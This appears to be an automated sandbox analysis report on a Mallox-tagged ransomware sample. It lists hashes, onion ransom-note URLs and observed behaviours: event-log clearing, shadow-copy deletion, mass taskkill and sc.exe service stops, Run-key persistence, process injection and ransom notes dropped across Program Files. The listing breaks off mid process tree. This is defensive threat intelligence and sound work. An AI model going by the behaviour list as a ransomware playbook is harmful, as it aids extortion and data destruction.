Resubmissions
26-04-2023 01:50
230426-b9bg3aec93 306-12-2022 18:46
221206-xepxvsdd29 1006-12-2022 18:33
221206-w697fafd3y 10Analysis
-
max time kernel
1535s -
max time network
1574s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
06-12-2022 18:46
Static task
static1
Behavioral task
behavioral1
Sample
a-Yaoofdkgd.exe
Resource
win10-20220812-en
Behavioral task
behavioral2
Sample
a-Yaoofdkgd.exe
Resource
win7-20220812-en
Behavioral task
behavioral3
Sample
a-Yaoofdkgd.exe
Resource
win10v2004-20220901-en
General
-
Target
a-Yaoofdkgd.exe
-
Size
12KB
-
MD5
2302e560d434d30be97e72035c203088
-
SHA1
8a018ebd03f0ea55b09fcbd602725570c7a2a4d2
-
SHA256
befbb0f6ce9243f8dfbf40cec9d2c8dd829f289758b0749d8ad807bc1dd0fdb1
-
SHA512
ab84e7c726c2dc70b535f3b0dbc6bd114bb18aff08d376ee9e166b2828464d3988fe9a9d61dbd1279d42e758305f2d4644ddab79ac31e57f13e3db66824a529e
-
SSDEEP
192:5r0rom3lP2KEN18VqYH5pqmnd1C7Dg5pbW1wFb/SWA0VLWx8stYcFmVc03KY:M51H5AmnCKw1vWA0VLWxptYcFmVc03K
Malware Config
Extracted
C:\FILE RECOVERY.txt
http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin
http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion
Signatures
-
Clears Windows event logs 1 TTPs 64 IoCs
Processes:
wevtutil.exepid process 3028 2804 4024 3024 2952 4988 1468 3352 4704 1200 4020 4596 4916 3024 3404 1044 3048 2008 4344 2328 2596 4124 4764 4112 4716 2892 2344 3840 4352 3732 3988 608 4792 3380 3652 4300 4556 4204 1304 4644 1728 4536 5116 1028 608 3016 4208 4880 wevtutil.exe 1516 2648 3688 1924 4784 3760 1484 3696 3444 4744 2164 4416 4440 3204 4688 3116 -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
a-Yaoofdkgd.exea-Yaoofdkgd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation a-Yaoofdkgd.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation a-Yaoofdkgd.exe -
Modifies file permissions 1 TTPs 18 IoCs
Processes:
takeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exepid process 4732 takeown.exe 4580 takeown.exe 1744 takeown.exe 4572 takeown.exe 4292 takeown.exe 3128 takeown.exe 3860 takeown.exe 3984 takeown.exe 1332 takeown.exe 3316 takeown.exe 4768 takeown.exe 1100 takeown.exe 4212 takeown.exe 4444 takeown.exe 2508 takeown.exe 5056 takeown.exe 4644 takeown.exe 672 takeown.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
a-Yaoofdkgd.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Xmblvnwpqgj = "\"C:\\Users\\Admin\\AppData\\Roaming\\Mcpwdirytk\\Xmblvnwpqgj.exe\"" a-Yaoofdkgd.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
a-Yaoofdkgd.exedescription ioc process File opened (read-only) \??\E: a-Yaoofdkgd.exe File opened (read-only) \??\G: a-Yaoofdkgd.exe File opened (read-only) \??\H: a-Yaoofdkgd.exe File opened (read-only) \??\K: a-Yaoofdkgd.exe File opened (read-only) \??\L: a-Yaoofdkgd.exe File opened (read-only) \??\N: a-Yaoofdkgd.exe File opened (read-only) \??\S: a-Yaoofdkgd.exe File opened (read-only) \??\B: a-Yaoofdkgd.exe File opened (read-only) \??\Z: a-Yaoofdkgd.exe File opened (read-only) \??\W: a-Yaoofdkgd.exe File opened (read-only) \??\M: a-Yaoofdkgd.exe File opened (read-only) \??\O: a-Yaoofdkgd.exe File opened (read-only) \??\P: a-Yaoofdkgd.exe File opened (read-only) \??\T: a-Yaoofdkgd.exe File opened (read-only) \??\J: a-Yaoofdkgd.exe File opened (read-only) \??\F: a-Yaoofdkgd.exe File opened (read-only) \??\U: a-Yaoofdkgd.exe File opened (read-only) \??\V: a-Yaoofdkgd.exe File opened (read-only) \??\A: a-Yaoofdkgd.exe File opened (read-only) \??\Q: a-Yaoofdkgd.exe File opened (read-only) \??\R: a-Yaoofdkgd.exe File opened (read-only) \??\X: a-Yaoofdkgd.exe File opened (read-only) \??\Y: a-Yaoofdkgd.exe File opened (read-only) \??\I: a-Yaoofdkgd.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 17 api.ipify.org -
Suspicious use of SetThreadContext 1 IoCs
Processes:
a-Yaoofdkgd.exedescription pid process target process PID 1808 set thread context of 548 1808 a-Yaoofdkgd.exe a-Yaoofdkgd.exe -
Drops file in Program Files directory 64 IoCs
Processes:
a-Yaoofdkgd.exedescription ioc process File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsMedTile.contrast-white_scale-200.png a-Yaoofdkgd.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-20.png a-Yaoofdkgd.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\cursors\win32_LinkDrop32x32.gif a-Yaoofdkgd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\pt-br\FILE RECOVERY.txt a-Yaoofdkgd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\da-dk\FILE RECOVERY.txt a-Yaoofdkgd.exe File created C:\Program Files\Microsoft Office\root\Office16\MSIPC\tr\FILE RECOVERY.txt a-Yaoofdkgd.exe File created C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\Assets\contrast-black\FILE RECOVERY.txt a-Yaoofdkgd.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_Subscription5-pl.xrm-ms a-Yaoofdkgd.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\en\SpreadsheetCompare_k_col.hxk a-Yaoofdkgd.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-20_contrast-white.png a-Yaoofdkgd.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosMedTile.contrast-white_scale-200.png a-Yaoofdkgd.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarLargeTile.scale-150.png a-Yaoofdkgd.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\PilotsHubApp.BackgroundWorker.winmd a-Yaoofdkgd.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Place\contrast-white\FILE RECOVERY.txt a-Yaoofdkgd.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_SubTest2-pl.xrm-ms a-Yaoofdkgd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\cs-cz\ui-strings.js a-Yaoofdkgd.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Images\SkypeAppList.targetsize-256_altform-unplated_contrast-white.png a-Yaoofdkgd.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\GenericMailMediumTile.scale-150.png a-Yaoofdkgd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\s_radio_selected_18.svg a-Yaoofdkgd.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.513.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\FILE RECOVERY.txt a-Yaoofdkgd.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\FILE RECOVERY.txt a-Yaoofdkgd.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Services.Store.Engagement_10.0.18101.0_x64__8wekyb3d8bbwe\AppxSignature.p7x a-Yaoofdkgd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\comment.svg a-Yaoofdkgd.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] a-Yaoofdkgd.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Yahoo-Light.scale-250.png a-Yaoofdkgd.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\AppxManifest.xml a-Yaoofdkgd.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core_zh_CN.jar a-Yaoofdkgd.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PersonalR_Retail-ppd.xrm-ms a-Yaoofdkgd.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteNotebookLargeTile.scale-100.png a-Yaoofdkgd.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailAppList.targetsize-40.png a-Yaoofdkgd.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019DemoR_BypassTrial180-ppd.xrm-ms a-Yaoofdkgd.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSWORD.OLB a-Yaoofdkgd.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteAppList.targetsize-36_altform-unplated.png a-Yaoofdkgd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-fr\FILE RECOVERY.txt a-Yaoofdkgd.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\Weather_TileWide.scale-100.png a-Yaoofdkgd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\sv-se\FILE RECOVERY.txt a-Yaoofdkgd.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNotePageLargeTile.scale-400.png a-Yaoofdkgd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\da-dk\FILE RECOVERY.txt a-Yaoofdkgd.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\Win10\MicrosoftSolitaireAppList.targetsize-96_altform-unplated_devicefamily-colorfulunplated.png a-Yaoofdkgd.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\Microsoft.People.Relevance.QueryClient.winmd a-Yaoofdkgd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_2x.png a-Yaoofdkgd.exe File created C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\FILE RECOVERY.txt a-Yaoofdkgd.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\logger\FILE RECOVERY.txt a-Yaoofdkgd.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\salesforce.ini a-Yaoofdkgd.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\MapsAppList.targetsize-30_altform-lightunplated.png a-Yaoofdkgd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\de-de\FILE RECOVERY.txt a-Yaoofdkgd.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected] a-Yaoofdkgd.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml a-Yaoofdkgd.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Collections\contrast-black\FILE RECOVERY.txt a-Yaoofdkgd.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019R_OEM_Perp-ppd.xrm-ms a-Yaoofdkgd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\lv_get.svg a-Yaoofdkgd.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\jfr\default.jfc a-Yaoofdkgd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-il\FILE RECOVERY.txt a-Yaoofdkgd.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\StoreLogo.scale-150.png a-Yaoofdkgd.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.targetsize-32_altform-unplated.png a-Yaoofdkgd.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteNotebookSmallTile.scale-100.png a-Yaoofdkgd.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Audio\Skype_Dtmf_9_Loud.m4a a-Yaoofdkgd.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft Help\MS.MSOUC.16.1033.hxn a-Yaoofdkgd.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\vlc.mo a-Yaoofdkgd.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core_ja.jar a-Yaoofdkgd.exe File opened for modification C:\Program Files\Microsoft Office\root\vreg\proof.es-es.msi.16.es-es.vreg.dat a-Yaoofdkgd.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\210x173\12.jpg a-Yaoofdkgd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ro-ro\ui-strings.js a-Yaoofdkgd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ro-ro\ui-strings.js a-Yaoofdkgd.exe -
Launches sc.exe 64 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 3048 sc.exe 4092 sc.exe 2444 sc.exe 4332 sc.exe 3996 sc.exe 3636 sc.exe 1456 sc.exe 3668 5056 sc.exe 1776 sc.exe 264 sc.exe 4780 sc.exe 4036 sc.exe 2476 sc.exe 4308 sc.exe 4656 sc.exe 4388 sc.exe 2164 sc.exe 628 sc.exe 1516 4396 sc.exe 5100 sc.exe 2864 sc.exe 3632 sc.exe 3280 sc.exe 1732 sc.exe 3944 sc.exe 1880 sc.exe 3172 sc.exe 3660 sc.exe 4184 sc.exe 448 3336 sc.exe 396 sc.exe 1656 sc.exe 4084 sc.exe 4300 sc.exe 3840 sc.exe 3756 sc.exe 3468 sc.exe 4092 sc.exe 3660 sc.exe 4976 sc.exe 1940 sc.exe 3120 sc.exe 3680 sc.exe 628 sc.exe 4056 sc.exe 4900 sc.exe 3404 sc.exe 3076 4500 sc.exe 1728 sc.exe 216 sc.exe 1928 sc.exe 3140 sc.exe 220 sc.exe 4488 sc.exe 1864 sc.exe 2508 sc.exe 2960 sc.exe 508 sc.exe 4536 sc.exe 404 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Discovers systems in the same network 1 TTPs 2 IoCs
-
Enumerates processes with tasklist 1 TTPs 6 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exepid process 2280 tasklist.exe 2328 tasklist.exe 4392 tasklist.exe 4488 tasklist.exe 3768 tasklist.exe 4556 tasklist.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 3652 vssadmin.exe -
Kills process with taskkill 64 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 1460 taskkill.exe 4848 4528 4424 4556 3880 2300 1428 taskkill.exe 4792 1232 2232 3048 taskkill.exe 4672 taskkill.exe 676 1148 4472 4904 2476 taskkill.exe 1308 taskkill.exe 5000 taskkill.exe 1508 412 1848 taskkill.exe 1200 taskkill.exe 4896 3028 2300 1404 taskkill.exe 4608 4300 taskkill.exe 220 taskkill.exe 4500 taskkill.exe 4136 taskkill.exe 3848 1092 1776 1332 4088 1800 taskkill.exe 3668 208 taskkill.exe 3140 2036 3500 1484 4184 820 1548 taskkill.exe 212 taskkill.exe 1548 1296 4492 3108 1320 1440 628 4184 1808 4848 taskkill.exe 1928 taskkill.exe 4388 2132 1200 1312 taskkill.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
a-Yaoofdkgd.exepid process 548 a-Yaoofdkgd.exe 548 a-Yaoofdkgd.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
a-Yaoofdkgd.exetakeown.exea-Yaoofdkgd.exevssvc.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exesc.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exesc.exetaskkill.exenet.exetaskkill.exenet.exewevtutil.exesc.exetaskkill.exesc.exedescription pid process Token: SeDebugPrivilege 1808 a-Yaoofdkgd.exe Token: SeTakeOwnershipPrivilege 1100 takeown.exe Token: SeTakeOwnershipPrivilege 548 a-Yaoofdkgd.exe Token: SeDebugPrivilege 548 a-Yaoofdkgd.exe Token: SeBackupPrivilege 3428 vssvc.exe Token: SeRestorePrivilege 3428 vssvc.exe Token: SeAuditPrivilege 3428 vssvc.exe Token: SeTakeOwnershipPrivilege 4580 takeown.exe Token: SeTakeOwnershipPrivilege 5056 takeown.exe Token: SeTakeOwnershipPrivilege 4644 takeown.exe Token: SeTakeOwnershipPrivilege 4444 takeown.exe Token: SeTakeOwnershipPrivilege 4572 takeown.exe Token: SeTakeOwnershipPrivilege 1332 takeown.exe Token: SeTakeOwnershipPrivilege 3128 takeown.exe Token: SeDebugPrivilege 4388 taskkill.exe Token: SeDebugPrivilege 4272 taskkill.exe Token: SeDebugPrivilege 2296 taskkill.exe Token: SeDebugPrivilege 4184 taskkill.exe Token: SeDebugPrivilege 4564 taskkill.exe Token: SeDebugPrivilege 4084 taskkill.exe Token: SeDebugPrivilege 3376 taskkill.exe Token: SeDebugPrivilege 508 taskkill.exe Token: SeDebugPrivilege 4976 taskkill.exe Token: SeDebugPrivilege 2224 taskkill.exe Token: SeDebugPrivilege 3764 taskkill.exe Token: SeDebugPrivilege 2196 taskkill.exe Token: SeDebugPrivilege 412 taskkill.exe Token: SeDebugPrivilege 1104 taskkill.exe Token: SeDebugPrivilege 1284 taskkill.exe Token: SeDebugPrivilege 1136 taskkill.exe Token: SeDebugPrivilege 3636 taskkill.exe Token: SeDebugPrivilege 820 taskkill.exe Token: SeDebugPrivilege 4764 taskkill.exe Token: SeDebugPrivilege 2164 taskkill.exe Token: SeDebugPrivilege 876 taskkill.exe Token: SeDebugPrivilege 1324 taskkill.exe Token: SeDebugPrivilege 3932 taskkill.exe Token: SeDebugPrivilege 2744 taskkill.exe Token: SeDebugPrivilege 1460 taskkill.exe Token: SeDebugPrivilege 4768 taskkill.exe Token: SeDebugPrivilege 2328 tasklist.exe Token: SeDebugPrivilege 4392 tasklist.exe Token: SeDebugPrivilege 4488 tasklist.exe Token: SeDebugPrivilege 3768 tasklist.exe Token: SeDebugPrivilege 4556 tasklist.exe Token: SeDebugPrivilege 2280 tasklist.exe Token: SeDebugPrivilege 4144 sc.exe Token: SeDebugPrivilege 1428 taskkill.exe Token: SeDebugPrivilege 3352 taskkill.exe Token: SeDebugPrivilege 3556 taskkill.exe Token: SeDebugPrivilege 64 taskkill.exe Token: SeDebugPrivilege 1136 sc.exe Token: SeDebugPrivilege 3940 taskkill.exe Token: SeDebugPrivilege 732 net.exe Token: SeDebugPrivilege 608 taskkill.exe Token: SeDebugPrivilege 1324 net.exe Token: SeDebugPrivilege 3648 wevtutil.exe Token: SeDebugPrivilege 996 sc.exe Token: SeDebugPrivilege 208 Token: SeDebugPrivilege 3820 Token: SeDebugPrivilege 1316 taskkill.exe Token: SeDebugPrivilege 4828 Token: SeDebugPrivilege 4732 Token: SeDebugPrivilege 920 sc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
a-Yaoofdkgd.execmd.exea-Yaoofdkgd.execmd.exedescription pid process target process PID 1808 wrote to memory of 5080 1808 a-Yaoofdkgd.exe cmd.exe PID 1808 wrote to memory of 5080 1808 a-Yaoofdkgd.exe cmd.exe PID 1808 wrote to memory of 5080 1808 a-Yaoofdkgd.exe cmd.exe PID 5080 wrote to memory of 1864 5080 cmd.exe reg.exe PID 5080 wrote to memory of 1864 5080 cmd.exe reg.exe PID 5080 wrote to memory of 1864 5080 cmd.exe reg.exe PID 5080 wrote to memory of 1100 5080 cmd.exe takeown.exe PID 5080 wrote to memory of 1100 5080 cmd.exe takeown.exe PID 5080 wrote to memory of 1100 5080 cmd.exe takeown.exe PID 1808 wrote to memory of 548 1808 a-Yaoofdkgd.exe a-Yaoofdkgd.exe PID 1808 wrote to memory of 548 1808 a-Yaoofdkgd.exe a-Yaoofdkgd.exe PID 1808 wrote to memory of 548 1808 a-Yaoofdkgd.exe a-Yaoofdkgd.exe PID 1808 wrote to memory of 548 1808 a-Yaoofdkgd.exe a-Yaoofdkgd.exe PID 1808 wrote to memory of 548 1808 a-Yaoofdkgd.exe a-Yaoofdkgd.exe PID 1808 wrote to memory of 548 1808 a-Yaoofdkgd.exe a-Yaoofdkgd.exe PID 1808 wrote to memory of 548 1808 a-Yaoofdkgd.exe a-Yaoofdkgd.exe PID 1808 wrote to memory of 548 1808 a-Yaoofdkgd.exe a-Yaoofdkgd.exe PID 1808 wrote to memory of 548 1808 a-Yaoofdkgd.exe a-Yaoofdkgd.exe PID 1808 wrote to memory of 548 1808 a-Yaoofdkgd.exe a-Yaoofdkgd.exe PID 5080 wrote to memory of 1372 5080 cmd.exe cmd.exe PID 5080 wrote to memory of 1372 5080 cmd.exe cmd.exe PID 5080 wrote to memory of 1372 5080 cmd.exe cmd.exe PID 5080 wrote to memory of 2348 5080 cmd.exe cacls.exe PID 5080 wrote to memory of 2348 5080 cmd.exe cacls.exe PID 5080 wrote to memory of 2348 5080 cmd.exe cacls.exe PID 548 wrote to memory of 3652 548 a-Yaoofdkgd.exe vssadmin.exe PID 548 wrote to memory of 3652 548 a-Yaoofdkgd.exe vssadmin.exe PID 548 wrote to memory of 4384 548 a-Yaoofdkgd.exe cmd.exe PID 548 wrote to memory of 4384 548 a-Yaoofdkgd.exe cmd.exe PID 548 wrote to memory of 4384 548 a-Yaoofdkgd.exe cmd.exe PID 548 wrote to memory of 2548 548 a-Yaoofdkgd.exe cmd.exe PID 548 wrote to memory of 2548 548 a-Yaoofdkgd.exe cmd.exe PID 548 wrote to memory of 2548 548 a-Yaoofdkgd.exe cmd.exe PID 548 wrote to memory of 1664 548 a-Yaoofdkgd.exe cmd.exe PID 548 wrote to memory of 1664 548 a-Yaoofdkgd.exe cmd.exe PID 548 wrote to memory of 1664 548 a-Yaoofdkgd.exe cmd.exe PID 2548 wrote to memory of 3816 2548 cmd.exe sc.exe PID 2548 wrote to memory of 3816 2548 cmd.exe sc.exe PID 2548 wrote to memory of 3816 2548 cmd.exe sc.exe PID 5080 wrote to memory of 1136 5080 cmd.exe cmd.exe PID 5080 wrote to memory of 1136 5080 cmd.exe cmd.exe PID 5080 wrote to memory of 1136 5080 cmd.exe cmd.exe PID 5080 wrote to memory of 3848 5080 cmd.exe cacls.exe PID 5080 wrote to memory of 3848 5080 cmd.exe cacls.exe PID 5080 wrote to memory of 3848 5080 cmd.exe cacls.exe PID 5080 wrote to memory of 1816 5080 cmd.exe cmd.exe PID 5080 wrote to memory of 1816 5080 cmd.exe cmd.exe PID 5080 wrote to memory of 1816 5080 cmd.exe cmd.exe PID 5080 wrote to memory of 2324 5080 cmd.exe cacls.exe PID 5080 wrote to memory of 2324 5080 cmd.exe cacls.exe PID 5080 wrote to memory of 2324 5080 cmd.exe cacls.exe PID 5080 wrote to memory of 1656 5080 cmd.exe cmd.exe PID 5080 wrote to memory of 1656 5080 cmd.exe cmd.exe PID 5080 wrote to memory of 1656 5080 cmd.exe cmd.exe PID 5080 wrote to memory of 4316 5080 cmd.exe cacls.exe PID 5080 wrote to memory of 4316 5080 cmd.exe cacls.exe PID 5080 wrote to memory of 4316 5080 cmd.exe cacls.exe PID 5080 wrote to memory of 3564 5080 cmd.exe cmd.exe PID 5080 wrote to memory of 3564 5080 cmd.exe cmd.exe PID 5080 wrote to memory of 3564 5080 cmd.exe cmd.exe PID 5080 wrote to memory of 740 5080 cmd.exe cacls.exe PID 5080 wrote to memory of 740 5080 cmd.exe cacls.exe PID 5080 wrote to memory of 740 5080 cmd.exe cacls.exe PID 5080 wrote to memory of 4388 5080 cmd.exe cmd.exe -
System policy modification 1 TTPs 2 IoCs
Processes:
a-Yaoofdkgd.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0" a-Yaoofdkgd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "1" a-Yaoofdkgd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\a-Yaoofdkgd.exe"C:\Users\Admin\AppData\Local\Temp\a-Yaoofdkgd.exe"1⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1808 -
